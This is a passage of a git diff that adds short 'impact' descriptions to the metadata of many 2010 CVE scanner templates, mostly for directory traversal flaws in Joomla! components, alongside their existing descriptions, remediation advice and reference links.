attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12142 diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 97e2f8b680..986b65fbd9 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Update to the latest version of Joomla! Component TRAVELbook or apply the necessary patches to fix the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index 4e5fb08797..ed6823bd03 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information. remediation: | Apply the latest security patches or updates provided by Joomla! to fix the directory traversal vulnerability in com_blog component. reference: diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml index 4d70f603eb..45b1714e0c 100644 --- a/http/cves/2010/CVE-2010-1586.yaml +++ b/http/cves/2010/CVE-2010-1586.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in red2301.html in HP System Management Homepage (SMH) 2.x.x.x allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the RedirectUrl parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the download of malware. remediation: | Apply the latest patches or updates provided by HP to fix the open redirect vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index 0b308e76cf..7c3d7de74b 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to unauthorized access and potential data leakage. remediation: | Apply the latest security patches or upgrade to a patched version of Joomla! Component JA Comment to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 50063fbc7c..40b0112b73 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Update to the latest version of Joomla! Component ZiMB Comment or apply the provided patch to fix the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index 871cb70ce9..caf4048c6e 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12284 diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index 21cadfdabc..d09211a4e2 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: | Update Joomla! Component WMI to the latest version or apply the provided patch to fix the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index 4fa5b296a7..217c10b797 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the entire Joomla! installation. remediation: | Update Joomla! Component Graphics to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index 02a1a91fc0..8095ffc8e3 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Update to the latest version of Joomla! Component SmartSite or apply the necessary patches to fix the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml index df934b435a..377b6971b2 100644 --- a/http/cves/2010/CVE-2010-1658.yaml +++ b/http/cves/2010/CVE-2010-1658.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can allow an attacker to read arbitrary files on the server, potentially leading to unauthorized access, sensitive information disclosure, or further attacks. remediation: | Update to the latest version of Joomla! Component NoticeBoard or apply the necessary patches to fix the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index aca6b5dab9..4a9e8567c7 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: | Apply the latest security patches or updates provided by the Joomla! project to fix the LFI vulnerability in Ultimate Portfolio 1.0 component. reference: diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index 9a0a597930..1641f405da 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: | Apply the latest patch or upgrade to a newer version of the Joomla! Component iF surfALERT to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index a05173fd97..a460cabfbb 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Apply the latest security patches or updates provided by the Joomla! Component MT Fire Eagle 1.2 vendor. reference: diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index 2518f37eb0..099e082cdb 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: | Apply the latest security patches or updates provided by Joomla! to fix the LFI vulnerability in the Online Market 2.x component. reference: diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index 42826ae2cf..2d90d022a2 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system. remediation: | Update to the latest version of the iNetLanka Contact Us Draw Root Map component or apply the patch provided by the vendor to fix the LFI vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index 1781de6033..0303382548 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to unauthorized access and potential data leakage. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11853 diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index ea84d01d63..2be3dd1b80 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -5,6 +5,8 @@ info: author: b0yd severity: medium description: A struts-based OGNL remote code execution vulnerability exists in ListSERV Maestro before and including version 9.0-8. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to a patched version of ListSERV Maestro that is not affected by this vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index e04c715081..e5dd5a9d38 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + This vulnerability can result in the exposure of sensitive data, such as configuration files, database credentials, or other sensitive information stored on the server. remediation: | To remediate this vulnerability, it is recommended to update the affected Joomla! component to the latest version or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index c974844413..9b0d09996d 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Apply the latest patch or upgrade to a newer version of the Joomla! Component OrgChart to mitigate the vulnerability. reference: diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index 393f882215..0ed11f6302 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12239 diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index 7b26216328..26d14ae791 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12288 diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index 528bc4d454..240a101e1a 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12238 diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 3456eec27c..101f243bfc 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12285 diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index bc44b3274a..7b613426c8 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12235 diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index 251d86e10d..5938b2cede 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12083 diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index 69988a1239..3cefd34f54 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12088 diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml index 525dd59f40..448b0e63fb 100644 --- a/http/cves/2010/CVE-2010-1980.yaml +++ b/http/cves/2010/CVE-2010-1980.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in joomlaflickr.php in the Joomla! Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12085 diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index 4190e6e9b4..b9b1de7d36 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12087 diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index 4217d612fc..188cd56173 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12121 diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index 143116f43b..0ab91d5d4a 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A drectory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12055 diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index 5ca9f60fc1..3c1464c312 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index d700c91591..ce91bb5a74 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + An attacker can exploit this vulnerability to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34003 diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index 06ddd8ceb0..6b30948c96 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34006 diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index 0789ec5658..3519d447c0 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34004 diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index a6a87d6481..d37195e0e0 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Percha Downloads Attach (com_perchadownloadsattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + This vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/34005 diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index 386617fa95..bb282e9dcf 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12595 diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 9d90510fc8..e68750deec 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potentially execute arbitrary code. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12611 diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index 95e9e13594..91a2159eca 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to retrieve arbitrary files via a .. (dot dot) in the controller parameter to index.php. + impact: | + An attacker can retrieve arbitrary files from the server, potentially leading to unauthorized access or sensitive data exposure. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12623 diff --git a/http/cves/2010/CVE-2010-2128.yaml b/http/cves/2010/CVE-2010-2128.yaml index 0b9e6a917b..65e52007ea 100644 --- a/http/cves/2010/CVE-2010-2128.yaml +++ b/http/cves/2010/CVE-2010-2128.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12607 diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index fc01ea65b1..b34e16609f 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/10946 diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index 462c397774..7386929571 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. + impact: | + An attacker can read, modify, or delete arbitrary files on the server, potentially leading to unauthorized access, data leakage, or system compromise. remediation: Upgrade to a supported product version. reference: - https://nvd.nist.gov/vuln/detail/CVE-2010-2307 diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index 6474e0f8ec..505c86bfc6 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/13981 diff --git a/http/cves/2010/CVE-2010-2682.yaml b/http/cves/2010/CVE-2010-2682.yaml index 262d95e344..85e3b0243c 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! website. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/14017 diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index d750cd5c80..2fdf2d2cd2 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive data exposure, and remote code execution. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: 